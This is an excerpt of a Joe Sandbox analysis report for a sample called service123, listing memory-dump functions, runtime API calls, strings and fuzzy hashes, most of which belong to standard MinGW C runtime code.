Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: c9000735617d2353077c19fac353fdb5362c4dc056a536b92d0bfdab6345f2e7
Instruction ID: e2ad45e1ead39999b78814c0eed62dc7b9b1ecb68f6a642e5da32187877d7702
Opcode Fuzzy Hash: c9000735617d2353077c19fac353fdb5362c4dc056a536b92d0bfdab6345f2e7
Instruction Fuzzy Hash: 71515AB26093009FCB10EF69D48465AFBF0FF85318F55891CE8888B658E735E849CF92

Function 6C38E0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 20608fb51cfd14817e71631c53166343b89bee31b9719481711851dfb9981156
Instruction ID: 736110c704d0c0edb2d2781b24d7d22ac043fde76475083667148d8d5d74fafd
Opcode Fuzzy Hash: 20608fb51cfd14817e71631c53166343b89bee31b9719481711851dfb9981156
Instruction Fuzzy Hash: A7213B7634A3048FCB04CF59D8815D673E6EBC232C72C867ED5488BB15D637A806CB90

Function 6C38E570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: 66e0f6ab4a0a7b61ee72e5db450307e6331e3dda3d911be94b68c6b7e95cc50a
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: B541057860A3128BD710DF29C04076AB7E5AF82318F644E19E4B487A95E335D94E8FE3

Function 6C38E59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: aea94973f42a9e290bdaa81c8e2200883d855f7926d49ee289f2c8877c8ce1f9
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: AE21D8786073124BDB10DE28C09066AB7E1AF82318F644E09E4F487E89E331D94ECFD2

Function 6C38E714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: a1dc31b6ddf020276a7c870ba45f6b6ad6b74aca660320a2ed32f7348325fb16
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: ADE0867448A3198ACA20CE28C4519D5B7D9DF5734CB504D06D4D587E54E331D94FCED7

Function 6C399249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C399260
GetProcAddress.KERNEL32 ref: 6C39927A
LoadLibraryW.KERNEL32 ref: 6C39929F
GetProcAddress.KERNEL32 ref: 6C3992B3

Strings

rand_s, xrefs: 6C39926F
advapi32.dll, xrefs: 6C399298
SystemFunction036, xrefs: 6C3992A8
msvcrt.dll, xrefs: 6C399255

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 906366da24dccc4082f5c0a4083d409bff1263282ac1fec2ee55aa3898176044
Instruction ID: d13e5d55720f480dadb64a9baee1b332eaa0d3a855faba6820ab85b32c4e2c20
Opcode Fuzzy Hash: 906366da24dccc4082f5c0a4083d409bff1263282ac1fec2ee55aa3898176044
Instruction Fuzzy Hash: F5F04FB29993008FCF00FFB9964664EBFB0BB06364F01092DD4C997608E2359418CB67

Function 6C3A7170 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C3A71C1
strlen.MSVCRT ref: 6C3A71DB
strlen.MSVCRT ref: 6C3A722B
strlen.MSVCRT ref: 6C3A7288
strlen.MSVCRT ref: 6C3A72DC

Strings

@JFl, xrefs: 6C3A721E, 6C3A72D1
*, xrefs: 6C3A7410
basic_string::append, xrefs: 6C3A747A, 6C3A7486, 6C3A7492, 6C3A749E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$@JFl$basic_string::append
API String ID: 551667898-2892835114
Opcode ID: 34fa55367f3280dbda98fb2faeaa1c15b189a5f14def04b72910ed6a61e109da
Instruction ID: bc9d0634eed14268d4e84b32a6ce5abc56d367b4f2baa0043e1c219926b1f0ad
Opcode Fuzzy Hash: 34fa55367f3280dbda98fb2faeaa1c15b189a5f14def04b72910ed6a61e109da
Instruction Fuzzy Hash: 88A13B70A086018FDB00DF68C0C4B5EBBE1FB46358F51896DD8989B749DB35E85ACF92

Function 6C41F670 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3FD7DE), ref: 6C41F70D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3FD7DE), ref: 6C41F738
memmove.MSVCRT ref: 6C41F787
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3FD7DE), ref: 6C41F7BD
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3FD7DE), ref: 6C41F808

Strings

basic_string::_M_replace, xrefs: 6C41F966

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 6e47a64e5d2ecc7fcdf28d41236a50cd22700413f1490a8235a21f44feadfa27
Instruction ID: 4134649b305a49b04b40cbf26f6df44b2f06137dee3a18c849cb2c56311aa25b
Opcode Fuzzy Hash: 6e47a64e5d2ecc7fcdf28d41236a50cd22700413f1490a8235a21f44feadfa27
Instruction Fuzzy Hash: 0C810674A0E3519FD301DF2CC190D2ABBE1AF86645F24896EE4E987B25D331D84ACB52

Function 6C38FEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C3900D2
WaitForSingleObject.KERNEL32 ref: 6C390117

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 3bc7c25a48d4649f5c7ff4a61e1670105c3939f1ace5eed19d0fac17004921bb
Instruction ID: fe22b50a881a4f422da40ca4dcf35410c8b61d90d99d932b50ef9af5204696ed
Opcode Fuzzy Hash: 3bc7c25a48d4649f5c7ff4a61e1670105c3939f1ace5eed19d0fac17004921bb
Instruction Fuzzy Hash: 33617D7070A3458FDB20EFAAD54435B7BF4BB4A308F508519E85987B44E772D849CFA2

Function 6C38E760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: cb9bb789ff716fec4f768e2b9f9e5e0d3848e9c5872b0eb835c49d180a73e4a2
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: 1D01A579A1A3168FCF10DA18C480A9BF7E5AB86318F155D29F48587B14D235D8CACBD2

Function 00CB2BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00CB2CC1

Strings

o, xrefs: 00CB30A8
0, xrefs: 00CB313E

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: d713053a471506428f1e6c6c4036ad9791c6f9ff8301d752cf4bf74ac6841028
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: 70F19271A042598FCB15CF69C4806DDFBF2BF89360F198229E864AB395D734EE45CB90

Function 6C3932C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C393391

Strings

o, xrefs: 6C393778
0, xrefs: 6C39380E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: 35819c95cba15447a72edb0e8b33a5dc99ad2409837afd6e1a68511d9e436a00
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: 85F191B1A052098FCB41CF69C4807DDBBF2BF89364F198269D898AB751E734E945CF90

Function 00CB14E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00CB14F0
LoadLibraryA.KERNEL32 ref: 00CB1506
GetProcAddress.KERNEL32 ref: 00CB1525
GetProcAddress.KERNEL32 ref: 00CB1537

Strings

libgcc_s_dw2-1.dll, xrefs: 00CB14E9, 00CB14FF
__deregister_frame_info, xrefs: 00CB152C
__register_frame_info, xrefs: 00CB151A

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 8215eb630cc65f586c6f6daf213ff1192e83b135cf7c52d26e785b85de594156
Instruction ID: bfa6cc23cabc68486b0855f84e43339e32be2379c138e6ce8d2c6d7edb0f001a
Opcode Fuzzy Hash: 8215eb630cc65f586c6f6daf213ff1192e83b135cf7c52d26e785b85de594156
Instruction Fuzzy Hash: AD012CF18093049BCB10BF79B95939EBFF8EB84751F45452DD9CA97201E77488088BA3

Function 6C3813E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C3813F0
LoadLibraryA.KERNEL32 ref: 6C381406
GetProcAddress.KERNEL32 ref: 6C381425
GetProcAddress.KERNEL32 ref: 6C381437

Strings

libgcc_s_dw2-1.dll, xrefs: 6C3813E9, 6C3813FF
__deregister_frame_info, xrefs: 6C38142C
__register_frame_info, xrefs: 6C38141A

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 8ee204f283d6a9e3c29bbb3989aab9689a7d6bfb0d8d4d40a6e4a36bce80251a
Instruction ID: 8230ce8d5939e332569aa278b418457a8f9996dcc1ca19fa01a7b532677b9e92
Opcode Fuzzy Hash: 8ee204f283d6a9e3c29bbb3989aab9689a7d6bfb0d8d4d40a6e4a36bce80251a
Instruction Fuzzy Hash: F501D4B290B3009BCB00FFB8A507A4EBFF4EA42654F81482DD99847A18D731C414CFA3

Function 6C423B80 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C423C1F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C3BE77E), ref: 6C423C83
memmove.MSVCRT ref: 6C423CBB
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C3BE77E), ref: 6C423D2A

Strings

basic_string::_M_replace, xrefs: 6C423EAF

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 91b1637887198f046087c0b6f9294386279edaf6cd154904dde7613f20ff6317
Instruction ID: 75a3c3daf97811f29b4627f4d51ff5dd10fd41902ae5f28c0968f59a546c6592
Opcode Fuzzy Hash: 91b1637887198f046087c0b6f9294386279edaf6cd154904dde7613f20ff6317
Instruction Fuzzy Hash: 299134366493558FC700DF29C081E1AFBF5BF89748F50892DE4899B724E778E985CB82

Function 6C3A74C0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3F30D0: memset.MSVCRT ref: 6C3F3115

strcmp.MSVCRT ref: 6C3A7521
strlen.MSVCRT ref: 6C3A753C
strlen.MSVCRT ref: 6C3A7583
strlen.MSVCRT ref: 6C3A75F4
